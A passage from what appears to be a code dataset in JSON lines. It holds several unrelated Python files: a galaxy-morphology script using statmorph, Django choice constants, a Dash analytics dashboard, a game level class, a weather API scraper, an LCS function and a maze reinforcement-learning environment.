/mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_galfit_model.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_mask.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_psf.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_sig.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_iso_residual.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_galfit_residual.fits /mnt/scratch/temp_galaxy_storage')\n endcopy = time.time() - startcopy\n\n # If one of the required files is missing, continue to next galaxy \n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits') or (not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits') and not \\\n path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits')) or not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits') or not \\\n path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits') or not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits') or (not \\\n path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits') and not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits'))):\n print(f'missing {galaxy}')\n writeFile = open(f'/mnt/scratch/missing/{galaxy}.txt', 'w') \n writeFile.write(f'{galaxy}\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits')):\n writeFile.write('missing original\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits')):\n writeFile.write('missing iso model\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits')):\n writeFile.write('missing galfit model\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits')):\n writeFile.write('missing mask\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits')):\n writeFile.write('missing psf\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits')):\n writeFile.write('missing sig\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits')):\n writeFile.write('missing iso residual\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits')):\n writeFile.write('missing galfit residual\\n')\n \n writeFile.close()\n clearTempFiles(galaxy)\n continue\n\n # ONLY PROCESS SMALLER FILES\n #---------------------------------------------------------------------------------------\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits') >= 300000000):\n writeFile = open(f'/mnt/scratch/largefile/{galaxy}.txt', 'w') \n writeFile.write(f'{galaxy}\\n')\n writeFile.close()\n clearTempFiles(galaxy)\n continue\n #---------------------------------------------------------------------------------------\n\n # If any of the galaxy files are empty then create galaxy corrupt file and continue to next galaxy\n if(checkCorrupt(galaxy)):\n writeFile = open(f'/mnt/scratch/corrupt/{galaxy}.txt', 'w') \n writeFile.write(f'corrupt\\n')\n writeFile.close()\n clearTempFiles(galaxy)\n continue\n\n # Beginning of segmentation map creation\n\n startseg = time.time()\n\n hdu = fits.open(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits')\n im_header = hdu[0].header\n im_data = hdu[0].data\n\n # Sky subtraction from original image\n sky_data = np.zeros(np.shape(im_data))\n sky_data += row.SKY\n im_sky_subtracted = im_data - sky_data\n\n # Calculate nucleus center\n ra = row.NGVS_ra\n dec = row.NGVS_dec\n mywcs = wcs.WCS(im_header)\n xCenter, yCenter = mywcs.all_world2pix([[ra, dec]], 0)[0]\n\n mask_data = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits')\n\n # If a iso model exists then use that file for the original model data, otherwise use galfit\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits'):\n original_model_data = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits')\n else:\n original_model_data = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits')\n\n # If nucleus exists then mask nucleus\n if(row.Nuc_Flag == 1):\n for i in range(len(mask_data)):\n for j in range(len(mask_data)):\n # TODO: Change radius of nucleus mask\n if(((i-xCenter)**2) + ((j-yCenter)**2) <= (5**2)):\n mask_data[i][j] = 100\n \n \n ellipse_data = np.zeros(np.shape(original_model_data))\n # Calculate median of original model values within 10 pixel radius from nucleus center\n pixelList = []\n for i in range(len(original_model_data)):\n for j in range(len(original_model_data)):\n if(((i-xCenter)**2) + ((j-yCenter)**2) <= (10**2) and mask_data[i][j] != 100):\n pixelList.append(original_model_data[i][j]) \n\n median = statistics.median(pixelList)\n\n # Create Segmentation Map\n seg_data = np.zeros(np.shape(original_model_data))\n ellipse_data = np.zeros(np.shape(original_model_data))\n \n # isEmpty flag is used for checking if a segmentation map is valid for processing. If segmentation map 2D list is all 0's then script crashes.\n isEmpty = True\n\n # if median is greater than 2*sky value then create segmentation map from original model values greater than 1.4*sky value within ellipse area\n if(median > 2*row.SKY):\n for i in range(len(original_model_data)): \n for j in range(len(original_model_data)):\n if(inEllipse(i,j,xCenter,yCenter,row.Size,row.AxisRatio,row.PA)):\n ellipse_data[i][j] = 100\n if(original_model_data[i][j] > (1.4*row.SKY)):\n seg_data[i][j] = 100\n isEmpty = False\n # If median is less than 2*sky value then create segmentation map from original model values greater than 1.1*sky value within ellipse area\n else:\n for i in range(len(original_model_data)):\n for j in range(len(original_model_data)):\n if(inEllipse(i,j,xCenter,yCenter,row.Size,row.AxisRatio,row.PA)):\n ellipse_data[i][j] = 100\n if(original_model_data[i][j] > (1.1*row.SKY)):\n seg_data[i][j] = 100\n isEmpty = False\n\n psf = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits')\n weightmap = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits')\n mask_data = np.array(mask_data, dtype=bool)\n\n endseg = time.time() - startseg\n \n # End of segmentation map creation\n\n\n # If the galaxy's segmentation map is empty with no area of interest, then create empty galaxy file and continue to next galaxy\n if(isEmpty): \n writeFile = open(f'/mnt/scratch/emptyseg/{galaxy}.txt', 'w') \n writeFile.write('empty')\n writeFile.close()\n clearTempFiles(galaxy)\n continue\n\n start_time = time.time()\n\n # run statmorph on current galaxy\n source_morphs = statmorph.source_morphology(im_sky_subtracted, seg_data, mask=mask_data, weightmap=weightmap, psf=psf)\n end_time = time.time() - start_time\n\n morph = source_morphs[0]\n\n startmodelcreate = time.time()\n\n # create model from statmorph results\n ny, nx = im_sky_subtracted.shape\n y, x = np.mgrid[0:ny, 0:nx]\n fitted_model = statmorph.ConvolvedSersic2D(\n amplitude=morph.sersic_amplitude,\n r_eff=morph.sersic_rhalf,\n n=morph.sersic_n,\n x_0=morph.sersic_xc,\n y_0=morph.sersic_yc,\n ellip=morph.sersic_ellip,\n theta=morph.sersic_theta)\n fitted_model.set_psf(psf)\n output_model_data = fitted_model(x, y)\n\n endmodelcreate = time.time() - startmodelcreate\n \n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits'):\n original_res_data = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits')\n else:\n original_res_data = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits')\n\n\n startfig = time.time()\n\n # normalize images, models, segmentation map\n output_res_data = im_sky_subtracted - output_model_data\n p1 = 10. ; p2 = 90.\n\n im_p1 = np.percentile(im_sky_subtracted.ravel(), p1)\n im_p2 = np.percentile(im_sky_subtracted.ravel(), p2)\n normSky = ImageNormalize(im_sky_subtracted, vmin=im_p1, vmax=im_p2)\n\n im_p1 = np.percentile(output_model_data.ravel(), p1)\n im_p2 = np.percentile(output_model_data.ravel(), p2)\n normOutputMod = ImageNormalize(output_model_data, vmin=im_p1, vmax=im_p2)\n\n im_p1 = np.percentile(original_model_data.ravel(), p1)\n im_p2 = np.percentile(original_model_data.ravel(), p2)\n normOriginalMod = ImageNormalize(original_model_data, vmin=im_p1, vmax=im_p2)\n\n im_p1 = np.percentile(output_res_data.ravel(), p1)\n im_p2 = np.percentile(output_res_data.ravel(), p2)\n normOutputRes = ImageNormalize(output_res_data, vmin=im_p1, vmax=im_p2)\n\n im_p1 = np.percentile(original_res_data.ravel(), p1)\n im_p2 = np.percentile(original_res_data.ravel(), p2)\n normOriginalRes = ImageNormalize(original_res_data, vmin=im_p1, vmax=im_p2)\n\n # create figures for images, models, segmentation map\n gs = gridspec.GridSpec(2, 4, width_ratios=[1, 1, 1, 1],\n wspace=0.2, hspace=0, top=0.7, bottom=0.05, left=0.1, right=0.5)\n\n fig = plt.figure(figsize=(30,10))\n\n ax= plt.subplot(gs[0,0])\n ax.imshow(im_sky_subtracted, norm=normSky, cmap='gray', origin='lower')\n ax.set_title('Sky Subtracted Image', fontsize=15)\n\n ax= plt.subplot(gs[0,1])\n ax.imshow(original_model_data, norm=normOriginalMod, cmap='gray', origin='lower')\n ax.set_title('Original Model', fontsize=15)\n\n ax= plt.subplot(gs[0,2])\n ax.imshow(output_model_data, norm=normOutputMod, cmap='gray', origin='lower')\n ax.set_title('Output Model', fontsize=15)\n\n ax= plt.subplot(gs[0,3])\n ax.imshow(mask_data, cmap='gray', origin='lower')\n ax.set_title('Mask', fontsize=15)\n\n ax= plt.subplot(gs[1,0])\n ax.imshow(seg_data, cmap='gray', origin='lower')\n ax.set_title('Segmap', fontsize=15)\n\n ax= plt.subplot(gs[1,1])\n ax.imshow(ellipse_data, cmap='gray', origin='lower')\n ax.set_title('Ellipse Area', fontsize=15)\n\n ax= plt.subplot(gs[1,2])\n ax.imshow(original_res_data, norm=normOriginalRes, cmap='gray', origin='lower')\n ax.set_title('Original Residual', fontsize=15)\n\n ax= plt.subplot(gs[1,3])\n ax.imshow(output_res_data, norm=normOutputRes, cmap='gray', origin='lower')\n ax.set_title('Output Residual', fontsize=15)\n\n endfig = time.time() - startfig\n\n # save figures as PNG image to output directory\n fig.savefig(f'/mnt/scratch/output/{galaxy}_sourcemorph:{round(end_time, 2)}_seg={round(endseg, 2)}_RE={round(row.Size, 3)}_mag={round(row.principleg_mag_cg, 3)}.png', facecolor='w', edgecolor='w', transparent=False, bbox_inches='tight')\n plt.close(fig)\n\n \n # UNCOMMENT TO SAVE AS MULTI EXTENSION FITS FILE INSTEAD OF PNG \n #------------------------------------------------------------------------------------------------------------------------ \n # primary_hdu = fits.PrimaryHDU(im_sky_subtracted, header=im_header)\n # image_hdu = fits.ImageHDU(output_model_data)\n # image_hdu2 = fits.ImageHDU(output_res_data)\n # hdul = fits.HDUList([primary_hdu, image_hdu, image_hdu2])\n\n # upload fits file to VOSpace\n # hdul.writeto(f'/mnt/scratch/output/{galaxy}_output.fits', overwrite=True)\n # os.system(f'vcp /mnt/scratch/output/{galaxy}_output.fits vos:ngvs/data/STATMORPH/FITS_output/{galaxy}_output.fits')\n # if path.isfile(f'/mnt/scratch/output/{galaxy}_output.fits'):\n # os.system(f'rm /mnt/scratch/output/{galaxy}_output.fits')\n #------------------------------------------------------------------------------------------------------------------------\n \n # UPLOAD PNG FILE WITH FLAGS\n # os.system(f'vcp /mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_Flag={morph.flag}_SersicFlag={morph.flag_sersic}.png \\\n # vos:ngvs/data/STATMORPH/filesize_bug/{galaxy}_time:{round(end_time, 2)}_Flag={morph.flag}_SersicFlag={morph.flag_sersic}.png')\n # if path.isfile(f'/mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_Flag={morph.flag}_SersicFlag={morph.flag_sersic}.png'):\n # os.system(f'rm /mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_Flag={morph.flag}_SersicFlag={morph.flag_sersic}.png')\n\n\n # UPLOAD PNG FILE WITH MEDIAN & SKY VALUES\n # os.system(f'vcp /mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_size={row.Size}_median={median}_2*sky={2*row.SKY}sky={row.SKY}.png \\\n # vos:ngvs/data/STATMORPH/memory_bug/{galaxy}_time:{round(end_time, 2)}_size={row.Size}_median={median}_2*sky={2*row.SKY}sky={row.SKY}.png')\n # if path.isfile(f'/mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_size={row.Size}_median={median}_2*sky={2*row.SKY}sky={row.SKY}.png'):\n # os.system(f'rm /mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_size={row.Size}_median={median}_2*sky={2*row.SKY}sky={row.SKY}.png')\n\n # UPLOAD PNG FILE WITH RUNNING TIMES & RE FACTOR & MAGNITUDE\n os.system(f'vcp /mnt/scratch/output/{galaxy}_sourcemorph:{round(end_time, 2)}_seg={round(endseg, 2)}_RE={round(row.Size, 3)}_mag={round(row.principleg_mag_cg, 3)}.png \\\n vos:ngvs/data/STATMORPH/dec17/{galaxy}_sourcemorph:{round(end_time, 2)}_seg={round(endseg, 2)}_RE={round(row.Size, 3)}_mag={round(row.principleg_mag_cg, 3)}.png')\n if path.isfile(f'/mnt/scratch/output/{galaxy}_sourcemorph:{round(end_time, 2)}_seg={round(endseg, 2)}_RE={round(row.Size, 3)}_mag={round(row.principleg_mag_cg, 3)}.png'):\n os.system(f'rm /mnt/scratch/output/{galaxy}_sourcemorph:{round(end_time, 2)}_seg={round(endseg, 2)}_RE={round(row.Size, 3)}_mag={round(row.principleg_mag_cg, 3)}.png')\n\n hdu.close()\n clearTempFiles(galaxy)\n print(f'complete {galaxy}')\n \nif __name__ == '__main__':\n\n #the index pairs represent the starting index and end index of the rows to parse in the csv for each process.\n\n #index_pairs = [[0,922], [922,1844], [1844,2766], [2766,3689]]\n index_pairs = [[200,250],[1000,1050], [2350,2400], [3050,3100]]\n #index_pairs = [[200,205],[1000,1005], [2350,2355], [3050,3055]]\n #index_pairs = [100,500]\n\n # multiprocessing option (index pairs must be 2D list)\n pool = mp.Pool(mp.cpu_count())\n pool.map(statmorphWrapper, index_pairs)\n \n # single process option (index pairs must be 1D list)\n #statmorphWrapper(index_pairs)\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":21278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65258847","text":"APP_TYPE_OPTIONS = ( \r\n ( 'IAF', 'IAF' ),\r\n ( 'CAF', 'CAF' ),\r\n )\r\n\r\nPAYMENT_MODE = ( \r\n ( 1, 'Pay @ Home' ),\r\n ( 2, 'Cash Deposit at Bank' ),\r\n ( 3, 'Debit Card' ),\r\n ( 4, 'Credit Card' ),\r\n ( 5, 'Demand Draft' ),\r\n ( 6, 'Online Payment' ),\r\n )\r\n\r\nPAYMENT_STATUS = ( \r\n ( 0, 'Payment Awaited' ),\r\n ( 1, 'Payment Completed' )\r\n )\r\n\r\nAPP_STATUS = ( \r\n ( 'Accepted for Test', 'Accepted for Test' ),\r\n ( 'Rejected for Test', 'Rejected for Test' ),\r\n ( 'Accepted for GD/PI', 'Accepted for GD/PI' ),\r\n ( 'Rejected for GD/PI', 'Rejected for GD/PI' ),\r\n ( 'Accepted for Admission', 'Accepted for Admission' ),\r\n ( 'Rejected for Admission', 'Rejected for Admission' ),\r\n )\r\n\r\nONLINE_STATUS = ( \r\n ( 'Incomplete', 'Incomplete' ),\r\n ( 'Failure', 'Failure' ),\r\n ( 'Success', 'Success' ),\r\n )\r\n\r\nORDER_STATUS = ( \r\n ( 'Application Pending', 'Application Pending' ),\r\n ( 'Photo Awaited', 'Photo Awaited' ),\r\n ( 'Payment Awaited', 'Payment Awaited' ),\r\n ( 'Payment Received', 'Payment Received' ),\r\n ( 'Application Submitted', 'Application Submitted' ),\r\n )\r\nORDER_TYPE = ( \r\n ( 'Online', 'Online' ),\r\n ( 'Offline', 'Offline' )\r\n )\r\n\r\nAPPLICATION_STATUS = ( \r\n ( 'Waiting for Payment', 'Waiting for Payment' ),\r\n ( 'Docs Verified', 'Docs Verified' ),\r\n ( 'Submitted To College', 'Submitted to College' ),\r\n )\r\nAPP_NATURE = ( \r\n ( 'Paid Application', 'Paid Application' ),\r\n ( 'Discounted Application', 'Discounted Application' ),\r\n ( 'Free Application', 'Free Application' ),\r\n )\r\n\r\nEXTRA_IMAGES_TYPE = ( \r\n ( 'Signature', 'Signature' ),\r\n ( 'Mother Signature', 'Mother Signature' ),\r\n ( 'Father Signature', 'Father Signature' ),\r\n ( 'Thumb', 'Thumb' ),\r\n ( 'Mail Address', 'Mail Address' ),\r\n ( 'Pmnt Address', 'Pmnt Address' ),\r\n )\r\n\r\nWORKFLOW = ( \r\n ( 'Shortlisted', 'Shortlisted' ),\r\n ( 'Completed', 'Completed' ),\r\n )\r\n\r\nRESULT_LIST = ( \r\n ( 0, 'Rejected' ),\r\n ( 1, 'Accepted' ),\r\n )\r\n\r\n","sub_path":"zlpbyyrtrsbez/studentinfo/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297334920","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\nfrom datetime import datetime\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\ndb = 'zen'\ndb_config = {'user': 'my_user',\n 'pwd': 'my_user_password',\n 'host': 'localhost',\n 'port': 5432,\n 'db': db}\nengine = create_engine('postgresql://{}:{}@{}:{}/{}'.format(db_config['user'],\n db_config['pwd'],\n db_config['host'],\n db_config['port'],\n db_config['db']))\n\n# получаем данные\nquery = '''\n SELECT * FROM dash_visits\n '''\ndash_visits = pd.io.sql.read_sql(query, con = engine)\ndash_visits['dt'] = pd.to_datetime(dash_visits['dt'])\n\nquery = '''\n SELECT * FROM dash_engagement\n '''\ndash_engagement = pd.io.sql.read_sql(query, con = engine)\ndash_engagement['dt'] = pd.to_datetime(dash_engagement['dt']).dt.round('min')\n\n# note = '''\n# Этот дашборд показывает: сколько взаимодействий пользователей с карточками происходит в системе с разбивкой по темам карточек, \n# как много событий генерируют источники с разными темами,\n# насколько хорошо пользователи конвертируются из показов карточек в просмотры статей. \n# Используйте выбор интервала даты показа, возрастных категорий и тем карточек для управления дашбордом.\n# '''\n\n# задаём лейаут\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets, compress=False)\napp.layout = html.Div(children=[ \n # формируем html\n html.H1(children = 'Анализ взаимодействия пользователей с карточками статей в Яндекс.Дзен'),\n html.H5(children = 'Этот дашборд показывает:'),\n html.H5(children = ' * сколько взаимодействий пользователей с карточками происходит в системе с разбивкой по темам карточек,'),\n html.H5(children = ' * как много событий генерируют источники с разными темами,'),\n html.H5(children = ' * насколько хорошо пользователи конвертируются из показов карточек в просмотры статей.'),\n html.Label('Используйте выбор интервала даты показа, возрастных категорий и тем карточек для управления дашбордом.'),\n #html.Label(note),\n html.Br(),\n html.Div([\n \n html.Div([\n # выбор временного периода\n html.Label('Дата:'),\n dcc.DatePickerRange(\n start_date = dash_visits['dt'].min(),\n end_date = dash_visits['dt'].max(),\n display_format = 'YYYY-MM-DD',\n id = 'dt_selector', \n ),\n html.Br(),\n html.Br(),\n html.Label('Возрастные категории:'),\n dcc.Dropdown(\n options = [{'label': x, 'value': x} for x in dash_visits['age_segment'].unique()],\n value = dash_visits['age_segment'].unique().tolist(),\n multi = True,\n id = 'age-dropdown'\n ), \n ], className = 'six columns'),\n \n html.Div([\n html.Label('Темы карточек:'),\n dcc.Dropdown(\n options = [{'label': x, 'value': x} for x in dash_visits['item_topic'].unique()],\n value = dash_visits['item_topic'].unique().tolist(),\n multi = True,\n id = 'item-topic-dropdown'\n ),\n ], className = 'six columns'),\n\n ], className = 'row'),\n\n html.Br(),\n\n html.Div([\n \n html.Div([\n html.H5('История событий по темам карточек:'),\n dcc.Graph(style = {'height': '50vw'},\n id = 'history-absolute-visits'\n ), \n ], className = 'six columns'), \n \n html.Div([\n html.H5('Разбивка событий по темам источников:'),\n dcc.Graph(style = {'height': '25vw'},\n id = 'pie-visits'\n ),\n html.H5('Глубина взаимодействия'),\n html.Label('среднее количество пользователей в минуту:'),\n dcc.Graph(style = {'height': '25vw'},\n id = 'engagement-graph'\n ),\n ], className = 'six columns'), \n \n ], className = 'row'),\n html.Br(),\n html.Br(),\n html.Br(),\n html.Br(),\n\n ])\n\n# описываем логику дашборда\n@app.callback(\n [Output('history-absolute-visits', 'figure'),\n Output('pie-visits', 'figure'),\n Output('engagement-graph', 'figure'),\n ],\n [Input('item-topic-dropdown', 'value'),\n Input('age-dropdown', 'value'),\n Input('dt_selector', 'start_date'),\n Input('dt_selector', 'end_date'),\n ])\ndef update_figures(selected_item_topics, selected_ages, start_date, end_date):\n\n # График истории событий по темам карточек\n items = (dash_visits\n .query('item_topic.isin(@selected_item_topics) and \\\n dt >= @start_date and dt <= @end_date and \\\n age_segment.isin(@selected_ages)')\n .groupby(['item_topic', 'dt'], as_index=False)\n .agg({'visits': 'sum'})\n .sort_values('visits', ascending=False)\n )\n data_by_item_topic = []\n for item_topic in items['item_topic'].unique():\n data_by_item_topic += [go.Scatter(x = items.query('item_topic == @item_topic')['dt'],\n y = items.query('item_topic == @item_topic')['visits'],\n mode = 'lines',\n stackgroup = 'one',\n name = item_topic)]\n\n # График разбивки событий по темам источников\n report = (dash_visits\n .query('item_topic.isin(@selected_item_topics) and \\\n dt >= @start_date and dt <= @end_date and \\\n age_segment.isin(@selected_ages)')\n .groupby('source_topic', as_index=False)\n .agg({'visits': 'sum'})\n )\n data_by_source_topic = [go.Pie(labels = report['source_topic'],\n values = report['visits'], \n showlegend = False,\n textposition = 'outside',\n texttemplate = '%{label} %{percent:.1%}',\n title_position = 'top center'\n )]\n\n # График средней глубины взаимодействия\n report = (dash_engagement\n .query('item_topic.isin(@selected_item_topics) and \\\n dt >= @start_date and dt <= @end_date and \\\n age_segment.isin(@selected_ages)')\n .groupby('event', as_index=False)\n .agg({'unique_users': 'mean'})\n .rename(columns={'unique_users': 'avg_unique_users'})\n .sort_values('avg_unique_users', ascending=False)\n )\n data_by_event = [go.Bar(x = report['event'],\n y = report['avg_unique_users'],\n text = report['avg_unique_users'].round(1),\n textposition = 'auto',\n width = 0.5)]\n\n # формируем результат для отображения\n return (\n {\n 'data': data_by_item_topic,\n 'layout': go.Layout(xaxis = {'title': 'Дата'},\n yaxis = {'title': 'Количество визитов'}\n )\n },\n {\n 'data': data_by_source_topic, \n 'layout': go.Layout(xaxis = {'title': 'Тема источника'},\n yaxis = {'title': 'Количество визитов'},\n #font_size = 11,\n #height = 500,\n )\n }, \n {\n 'data': data_by_event, \n 'layout': go.Layout(xaxis = {'title': 'Событие'},\n yaxis = {'title': f'Среднее количество пользователей'}\n )\n },\n ) \n\nif __name__ == '__main__':\n app.run_server(debug = True, host='0.0.0.0')","sub_path":"Project_10_yandex_zens_dashboard/dashboard/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":9305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"592557724","text":"from menu.image import Image\n\n\nclass Level:\n _LEVEL1_IMAGE_PATH = 'menu/level1.png'\n _LEVEL2_IMAGE_PATH = 'menu/level2.png'\n _LEVEL3_IMAGE_PATH = 'menu/level3.png'\n\n def __init__(self):\n self.current_level = 1\n self.levels = {1: 14, 2: 21, 3: 28}\n self.images = [Image(250, 100, self._LEVEL1_IMAGE_PATH), Image(250, 100, self._LEVEL2_IMAGE_PATH),\n Image(250, 100, self._LEVEL3_IMAGE_PATH)]\n self.duration = 180\n\n def show(self, screen):\n if self.duration > 0:\n self.images[self.current_level - 1].show(screen)\n self.duration -= 1\n\n def update(self):\n if self.levels[self.current_level] == 0 and self.current_level < 3:\n self.current_level += 1\n self.duration = 180\n","sub_path":"level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316641989","text":"'''\nCalls Weather Underground API for Hourly Weather Data\nfor April 2015\n'''\n\nimport requests\nimport csv\nimport time\nfrom datetime import date\nfrom dateutil.rrule import rrule, DAILY\n\nwith open('april_wu1.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['hour', 'day', 'month', 'year', 'precipitation_in', 'temp_f', 'temp_c', 'humidity'])\n \n urlstart = 'http://api.wunderground.com/api/[API_KEY]/history_'\n urlend = '/q/NY/New_York.json'\n \n st = date(2015, 4, 1)\n end = date(2015, 4, 30)\n \n for dt in rrule(DAILY, dtstart=st, until=end):\n d = requests.get(urlstart + str(dt.strftime(\"%Y%m%d\")) + urlend).json()\n try:\n for h in d['history']['observations']:\n writer.writerow([h['date']['hour'], h['date']['mday'], h['date']['mon'], h['date']['year'],\n h['precipm'], h['tempi'], h['tempm'], h['hum']])\n except KeyError:\n time.sleep(600)\n d = requests.get(urlstart + str(dt.strftime(\"%Y%m%d\")) + urlend).json()\n for h in d['history']['observations']:\n writer.writerow([h['date']['hour'], h['date']['mday'], h['date']['mon'], h['date']['year'],\n h['precipm'], h['tempi'], h['tempm'], h['hum']])","sub_path":"kevin/weather_scrape.py","file_name":"weather_scrape.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"207394993","text":"# https://atcoder.jp/contests/dp/tasks/dp_f?lang=ja\n\n# get LCS length\ndef lcs_len(s1,s2):\n n1,n2 = len(s1),len(s2)\n dp = [ [0]*(n2+1) for _ in range(n1+1) ]\n for i in range(1,n1+1):\n for j in range(1,n2+1):\n dp[i][j] = max(dp[i-1][j], dp[i][j-1]) \n if s1[i-1] == s2[j-1]: dp[i][j] = dp[i-1][j-1]+1\n return dp[-1][-1]\n\nans = lcs_len(s1,s2)\nprint(ans)","sub_path":"0_libraries/py_typicals/LCS.py","file_name":"LCS.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"290821034","text":"import sys\n\nclass environment:\n\t\n\tdef __init__(self, filename):\n\t\tself.filename = filename\n\t\tself.step_reward = -1\n\n\t\tmaze = []\n\t\twith open(filename, \"r\") as f:\n\t\t\trow = f.readline()\n\t\t\twhile row:\n\t\t\t\trow = row.strip(\"\\n\")\n\t\t\t\tmaze.append(list(row))\n\t\t\t\trow = f.readline()\n\n\t\tself.V = {}\n\t\tself.goal = (-1, -1)\n\t\tfor i in range(len(maze)):\n\t\t\tfor j in range(len(maze[0])):\n\t\t\t\tif maze[i][j] != \"*\":\n\t\t\t\t\tself.V[(i,j)] = 0\n\t\t\t\tif maze[i][j] == \"G\":\n\t\t\t\t\tself.goal = (i,j)\n\t\t\t\t\tself.end_state = (i,j)\n\t\t\t\tif maze[i][j] == \"S\":\n\t\t\t\t\tself.init_state = (i,j) \n\n\t\tself.cur_state = self.init_state\n\n\tdef step(self, a):\n\n\t\tif self.cur_state == self.end_state:\n\t\t\treturn self.cur_state, 0, 1 \n\n\t\tnext_state = (self.cur_state[0] + a[0], self.cur_state[1] + a[1])\n\t\tnext_state = self.cur_state if (next_state not in self.V) else next_state\n\t\tself.cur_state = next_state\n\n\t\treward = self.step_reward \n\t\tis_terminal = 1 if next_state == self.goal else 0\n\n\t\treturn next_state, reward, is_terminal\n\n\tdef reset(self):\n\t\tself.cur_state = self.init_state\n\t\treturn self.init_state\n\n# maze_input = \"medium_maze.txt\"\n# output_file = \"output.feedback\"\n# action_seq_file = \"medium_maze_action_seq.txt\"\nmaze_input = sys.argv[1]\noutput_file = sys.argv[2]\naction_seq_file = sys.argv[3]\n\nactions = [(0,-1), (-1,0), (0,1), (1,0)]\n\nmaze_solver = environment(maze_input)\n\nwith open(action_seq_file, \"r\") as f:\n\taction_seq = f.readline().strip().split(\" \")\n\taction_seq = [int(e) for e in action_seq]\n\nwith open(output_file, \"w\") as f:\n\tfor i in action_seq:\n\t\tnext_state, reward, is_terminal = maze_solver.step(actions[i])\n\t\tres = str(next_state[0]) + \" \" + str(next_state[1]) + \" \" + str(reward) + \" \" + str(is_terminal) + \"\\n\"\n\t\tf.write(res) \n\n\n\n\n\n\n\n\n\n\n","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"296644212","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport scipy.stats\nimport matplotlib.pyplot as plt\nfrom parameter_estimation import confidence_interval as ci\n\ndef calc_CI_bounds(n_obs, bkg, alpha=0.05):\n\n lambda_CI_LL_twosided, lambda_CI_UL_twosided = ci.poisson_two_sided(n_obs, alpha=alpha)\n lambda_CI_UL_onesided = ci.poisson_upper(n_obs, alpha=alpha)\n lambda_CI_UL_onesided_CLs = ci.poisson_upper_CLs(n_obs, bkg, 